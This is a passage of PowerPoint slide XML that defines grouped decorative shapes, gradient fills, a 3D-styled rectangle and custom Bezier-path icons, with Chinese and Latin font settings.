                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="6" name="Rectangle 7"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8087643" y="4036682"/>
                <a:ext cx="1720740" cy="50962"/>
              </a:xfrm>
              <a:prstGeom prst="rect">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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7" name="Rectangle 8"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1765833" y="4036682"/>
                <a:ext cx="1274973" cy="50962"/>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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="8" name="Rectangle 9"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9808382" y="4036682"/>
                <a:ext cx="1274973" cy="50962"/>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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="9" name="Group 10"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8057" y="2772"/>
              <a:ext cx="2054" cy="3685"/>
              <a:chOff x="7980911" y="2484779"/>
              <a:chExt cx="1304470" cy="2340121"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="10" name="Group 11"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="7980911" y="2484779"/>
                <a:ext cx="1304470" cy="1802479"/>
                <a:chOff x="3149600" y="2480384"/>
                <a:chExt cx="1201204" cy="1660005"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="17" name="等腰三角形 51"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm flipV="1">
                  <a:off x="3149600" y="3200883"/>
                  <a:ext cx="1201204" cy="939506"/>
                </a:xfrm>
                <a:prstGeom prst="triangle">
                  <a:avLst/>
                </a:prstGeom>
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="accent4"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="EEECE1">
                        <a:lumMod val="90000"/>
                        <a:alpha val="0"/>
                      </a:srgbClr>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
                <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:effectLst/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                    <a:solidFill>
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="18" name="矩形 52"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3630724" y="2480384"/>
                  <a:ext cx="720080" cy="720080"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:effectLst>
                  <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                    <a:srgbClr val="000000">
                      <a:alpha val="35000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:scene3d>
                  <a:camera prst="isometricOffAxis2Top">
                    <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                  </a:camera>
                  <a:lightRig rig="chilly" dir="t">
                    <a:rot lat="0" lon="0" rev="600000"/>
                  </a:lightRig>
                </a:scene3d>
                <a:sp3d extrusionH="666750"/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                    <a:solidFill>
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11" name="Oval 12"/>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8347955" y="4239008"/>
                <a:ext cx="585892" cy="585892"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln w="3810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id-ID"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="12" name="Group 13"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="8468992" y="4362838"/>
                <a:ext cx="328308" cy="328308"/>
                <a:chOff x="8216107" y="2577307"/>
                <a:chExt cx="464344" cy="464344"/>
              </a:xfrm>
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="13" name="AutoShape 52"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8216107" y="2577307"/>
                  <a:ext cx="464344" cy="464344"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="+- 0 10800 87"/>
                    <a:gd name="T1" fmla="*/ T0 w 21426"/>
                    <a:gd name="T2" fmla="+- 0 10799 73"/>
                    <a:gd name="T3" fmla="*/ 10799 h 21453"/>
                    <a:gd name="T4" fmla="+- 0 10800 87"/>
                    <a:gd name="T5" fmla="*/ T4 w 21426"/>
                    <a:gd name="T6" fmla="+- 0 10799 73"/>
                    <a:gd name="T7" fmla="*/ 10799 h 21453"/>
                    <a:gd name="T8" fmla="+- 0 10800 87"/>
                    <a:gd name="T9" fmla="*/ T8 w 21426"/>
                    <a:gd name="T10" fmla="+- 0 10799 73"/>
                    <a:gd name="T11" fmla="*/ 10799 h 21453"/>
                    <a:gd name="T12" fmla="+- 0 10800 87"/>
                    <a:gd name="T13" fmla="*/ T12 w 21426"/>
                    <a:gd name="T14" fmla="+- 0 10799 73"/>
                    <a:gd name="T15" fmla="*/ 10799 h 21453"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T1" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T5" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T9" y="T11"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T13" y="T15"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21426" h="21453">
                      <a:moveTo>
                        <a:pt x="8034" y="20112"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="5816" y="17892"/>
                        <a:pt x="3556" y="15628"/>
                        <a:pt x="1338" y="13408"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3241" y="7240"/>
                        <a:pt x="11488" y="7509"/>
                        <a:pt x="13391" y="1341"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15609" y="3560"/>
                        <a:pt x="17869" y="5825"/>
                        <a:pt x="20087" y="8045"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18184" y="14212"/>
                        <a:pt x="9937" y="13944"/>
                        <a:pt x="8034" y="20112"/>
                      </a:cubicBezTo>
                      <a:moveTo>
                        <a:pt x="21034" y="7097"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="14338" y="393"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="14006" y="60"/>
                        <a:pt x="13525" y="-73"/>
                        <a:pt x="13069" y="39"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12828" y="98"/>
                        <a:pt x="12614" y="222"/>
                        <a:pt x="12444" y="393"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12292" y="545"/>
                        <a:pt x="12177" y="733"/>
                        <a:pt x="12112" y="944"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11808" y="1929"/>
                        <a:pt x="11283" y="2785"/>
                        <a:pt x="10507" y="3562"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9471" y="4598"/>
                        <a:pt x="8121" y="5384"/>
                        <a:pt x="6693" y="6214"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5177" y="7094"/>
                        <a:pt x="3611" y="8006"/>
                        <a:pt x="2328" y="9290"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1237" y="10383"/>
                        <a:pt x="493" y="11600"/>
                        <a:pt x="59" y="13011"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="-87" y="13488"/>
                        <a:pt x="40" y="14004"/>
                        <a:pt x="391" y="14356"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="7087" y="21060"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="7419" y="21393"/>
                        <a:pt x="7900" y="21526"/>
                        <a:pt x="8356" y="21414"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8597" y="21354"/>
                        <a:pt x="8811" y="21231"/>
                        <a:pt x="8981" y="21060"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9133" y="20908"/>
                        <a:pt x="9248" y="20720"/>
                        <a:pt x="9314" y="20508"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9617" y="19523"/>
                        <a:pt x="10142" y="18667"/>
                        <a:pt x="10918" y="17890"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11954" y="16853"/>
                        <a:pt x="13304" y="16069"/>
                        <a:pt x="14733" y="15239"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16248" y="14357"/>
                        <a:pt x="17814" y="13446"/>
                        <a:pt x="19097" y="12162"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20188" y="11070"/>
                        <a:pt x="20932" y="9852"/>
                        <a:pt x="21366" y="8440"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21512" y="7965"/>
                        <a:pt x="21385" y="7448"/>
                        <a:pt x="21034" y="7097"/>
                      </a:cubicBezTo>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14" name="AutoShape 53"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8390732" y="2736850"/>
                  <a:ext cx="125413" cy="130175"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="+- 0 10801 59"/>
                    <a:gd name="T1" fmla="*/ T0 w 21484"/>
                    <a:gd name="T2" fmla="+- 0 10799 41"/>
                    <a:gd name="T3" fmla="*/ 10799 h 21516"/>
                    <a:gd name="T4" fmla="+- 0 10801 59"/>
                    <a:gd name="T5" fmla="*/ T4 w 21484"/>
                    <a:gd name="T6" fmla="+- 0 10799 41"/>
                    <a:gd name="T7" fmla="*/ 10799 h 21516"/>
                    <a:gd name="T8" fmla="+- 0 10801 59"/>
                    <a:gd name="T9" fmla="*/ T8 w 21484"/>
                    <a:gd name="T10" fmla="+- 0 10799 41"/>
                    <a:gd name="T11" fmla="*/ 10799 h 21516"/>
                    <a:gd name="T12" fmla="+- 0 10801 59"/>
                    <a:gd name="T13" fmla="*/ T12 w 21484"/>
                    <a:gd name="T14" fmla="+- 0 10799 41"/>
                    <a:gd name="T15" fmla="*/ 10799 h 21516"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T1" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T5" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T9" y="T11"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T13" y="T15"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21484" h="21516">
                      <a:moveTo>
                        <a:pt x="17511" y="14987"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="17287" y="15384"/>
                        <a:pt x="17032" y="15740"/>
                        <a:pt x="16731" y="16049"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15340" y="14692"/>
                        <a:pt x="13947" y="13205"/>
                        <a:pt x="12559" y="11675"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12912" y="11521"/>
                        <a:pt x="13287" y="11362"/>
                        <a:pt x="13689" y="11198"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14092" y="11034"/>
                        <a:pt x="14494" y="10927"/>
                        <a:pt x="14895" y="10861"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15308" y="10801"/>
                        <a:pt x="15715" y="10819"/>
                        <a:pt x="16122" y="10913"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16527" y="11011"/>
                        <a:pt x="16909" y="11222"/>
                        <a:pt x="17262" y="11554"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17612" y="11890"/>
                        <a:pt x="17835" y="12244"/>
                        <a:pt x="17923" y="12620"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18020" y="13004"/>
                        <a:pt x="18025" y="13392"/>
                        <a:pt x="17958" y="13789"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17883" y="14187"/>
                        <a:pt x="17738" y="14585"/>
                        <a:pt x="17511" y="14987"/>
                      </a:cubicBezTo>
                      <a:moveTo>
                        <a:pt x="5799" y="10193"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="5096" y="10221"/>
                        <a:pt x="4482" y="9996"/>
                        <a:pt x="3946" y="9496"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3717" y="9285"/>
                        <a:pt x="3558" y="9028"/>
                        <a:pt x="3461" y="8724"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3359" y="8420"/>
                        <a:pt x="3326" y="8088"/>
                        <a:pt x="3366" y="7723"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3397" y="7363"/>
                        <a:pt x="3509" y="6989"/>
                        <a:pt x="3703" y="6610"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3889" y="6231"/>
                        <a:pt x="4160" y="5852"/>
                        <a:pt x="4510" y="5487"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5768" y="6694"/>
                        <a:pt x="7022" y="8018"/>
                        <a:pt x="8282" y="9388"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7330" y="9893"/>
                        <a:pt x="6501" y="10164"/>
                        <a:pt x="5799" y="10193"/>
                      </a:cubicBezTo>
                      <a:moveTo>
                        <a:pt x="19678" y="8570"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="18868" y="7915"/>
                        <a:pt x="18055" y="7470"/>
                        <a:pt x="17235" y="7250"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16421" y="7031"/>
                        <a:pt x="15603" y="6942"/>
                        <a:pt x="14779" y="6998"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13964" y="7059"/>
                        <a:pt x="13130" y="7236"/>
                        <a:pt x="12296" y="7545"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11462" y="7859"/>
                        <a:pt x="10625" y="8200"/>
                        <a:pt x="9782" y="8593"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8448" y="7115"/>
                        <a:pt x="7114" y="5658"/>
                        <a:pt x="5778" y="4299"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6382" y="3775"/>
                        <a:pt x="6963" y="3509"/>
                        <a:pt x="7526" y="3490"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8088" y="3467"/>
                        <a:pt x="8631" y="3523"/>
                        <a:pt x="9145" y="3649"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9669" y="3775"/>
                        <a:pt x="10149" y="3883"/>
                        <a:pt x="10590" y="3967"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11038" y="4051"/>
                        <a:pt x="11424" y="3958"/>
                        <a:pt x="11765" y="3682"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12123" y="3382"/>
                        <a:pt x="12321" y="2994"/>
                        <a:pt x="12351" y="2526"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12376" y="2054"/>
                        <a:pt x="12189" y="1596"/>
                        <a:pt x="11782" y="1147"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11258" y="569"/>
                        <a:pt x="10630" y="216"/>
                        <a:pt x="9872" y="85"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9126" y="-41"/>
                        <a:pt x="8358" y="-30"/>
                        <a:pt x="7564" y="136"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6780" y="309"/>
                        <a:pt x="6032" y="595"/>
                        <a:pt x="5324" y="997"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4617" y="1399"/>
                        <a:pt x="4048" y="1811"/>
                        <a:pt x="3626" y="2213"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3464" y="2066"/>
                        <a:pt x="3302" y="1918"/>
                        <a:pt x="3141" y="1773"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2963" y="1614"/>
                        <a:pt x="2739" y="1530"/>
                        <a:pt x="2471" y="1535"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2200" y="1535"/>
                        <a:pt x="1977" y="1647"/>
                        <a:pt x="1793" y="1853"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1615" y="2054"/>
                        <a:pt x="1530" y="2288"/>
                        <a:pt x="1565" y="2536"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1589" y="2793"/>
                        <a:pt x="1696" y="2989"/>
                        <a:pt x="1880" y="3139"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2044" y="3270"/>
                        <a:pt x="2203" y="3401"/>
                        <a:pt x="2364" y="3537"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1731" y="4276"/>
                        <a:pt x="1207" y="5094"/>
                        <a:pt x="795" y="5957"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="378" y="6820"/>
                        <a:pt x="130" y="7676"/>
                        <a:pt x="37" y="8509"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="-59" y="9346"/>
                        <a:pt x="33" y="10113"/>
                        <a:pt x="298" y="10824"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="566" y="11540"/>
                        <a:pt x="1056" y="12148"/>
                        <a:pt x="1774" y="12723"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2942" y="13658"/>
                        <a:pt x="4321" y="14056"/>
                        <a:pt x="5915" y="13967"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7507" y="13874"/>
                        <a:pt x="9223" y="13415"/>
                        <a:pt x="11064" y="12461"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12532" y="14093"/>
                        <a:pt x="14002" y="15716"/>
                        <a:pt x="15470" y="17223"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14849" y="17728"/>
                        <a:pt x="14305" y="18018"/>
                        <a:pt x="13826" y="18111"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13344" y="18210"/>
                        <a:pt x="12917" y="18200"/>
                        <a:pt x="12530" y="18088"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12142" y="17971"/>
                        <a:pt x="11782" y="17803"/>
                        <a:pt x="11455" y="17587"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11125" y="17368"/>
                        <a:pt x="10799" y="17181"/>
                        <a:pt x="10474" y="17026"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10154" y="16872"/>
                        <a:pt x="9823" y="16788"/>
                        <a:pt x="9486" y="16783"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9145" y="16778"/>
                        <a:pt x="8785" y="16937"/>
                        <a:pt x="8388" y="17265"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7981" y="17606"/>
                        <a:pt x="7777" y="18004"/>
                        <a:pt x="7777" y="18453"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7777" y="18897"/>
                        <a:pt x="7991" y="19351"/>
                        <a:pt x="8408" y="19809"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8830" y="20268"/>
                        <a:pt x="9379" y="20651"/>
                        <a:pt x="10042" y="20955"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10708" y="21259"/>
                        <a:pt x="11455" y="21451"/>
                        <a:pt x="12279" y="21502"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13103" y="21559"/>
                        <a:pt x="13970" y="21437"/>
                        <a:pt x="14886" y="21109"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15807" y="20787"/>
                        <a:pt x="16721" y="20202"/>
                        <a:pt x="17617" y="19332"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18051" y="19739"/>
                        <a:pt x="18489" y="20127"/>
                        <a:pt x="18921" y="20501"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19107" y="20656"/>
                        <a:pt x="19328" y="20731"/>
                        <a:pt x="19601" y="20712"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19861" y="20703"/>
                        <a:pt x="20090" y="20586"/>
                        <a:pt x="20269" y="20375"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20455" y="20160"/>
                        <a:pt x="20532" y="19921"/>
                        <a:pt x="20503" y="19674"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20477" y="19421"/>
                        <a:pt x="20371" y="19229"/>
                        <a:pt x="20192" y="19089"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19755" y="18752"/>
                        <a:pt x="19321" y="18397"/>
                        <a:pt x="18884" y="18022"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19626" y="17143"/>
                        <a:pt x="20221" y="16217"/>
                        <a:pt x="20664" y="15300"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21103" y="14379"/>
                        <a:pt x="21367" y="13490"/>
                        <a:pt x="21453" y="12667"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21540" y="11839"/>
                        <a:pt x="21439" y="11091"/>
                        <a:pt x="21159" y="10412"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20880" y="9725"/>
                        <a:pt x="20386" y="9135"/>
                        <a:pt x="19678" y="8570"/>
                      </a:cubicBezTo>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15" name="AutoShape 54"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8375650" y="2896394"/>
                  <a:ext cx="70644" cy="73819"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="+- 0 10791 197"/>
                    <a:gd name="T1" fmla="*/ T0 w 21188"/>
                    <a:gd name="T2" fmla="+- 0 10794 193"/>
                    <a:gd name="T3" fmla="*/ 10794 h 21203"/>
                    <a:gd name="T4" fmla="+- 0 10791 197"/>
                    <a:gd name="T5" fmla="*/ T4 w 21188"/>
                    <a:gd name="T6" fmla="+- 0 10794 193"/>
                    <a:gd name="T7" fmla="*/ 10794 h 21203"/>
                    <a:gd name="T8" fmla="+- 0 10791 197"/>
                    <a:gd name="T9" fmla="*/ T8 w 21188"/>
                    <a:gd name="T10" fmla="+- 0 10794 193"/>
                    <a:gd name="T11" fmla="*/ 10794 h 21203"/>
                    <a:gd name="T12" fmla="+- 0 10791 197"/>
                    <a:gd name="T13" fmla="*/ T12 w 21188"/>
                    <a:gd name="T14" fmla="+- 0 10794 193"/>
                    <a:gd name="T15" fmla="*/ 10794 h 21203"/>
                  </a:gdLst>
                  <a:ahLst/>
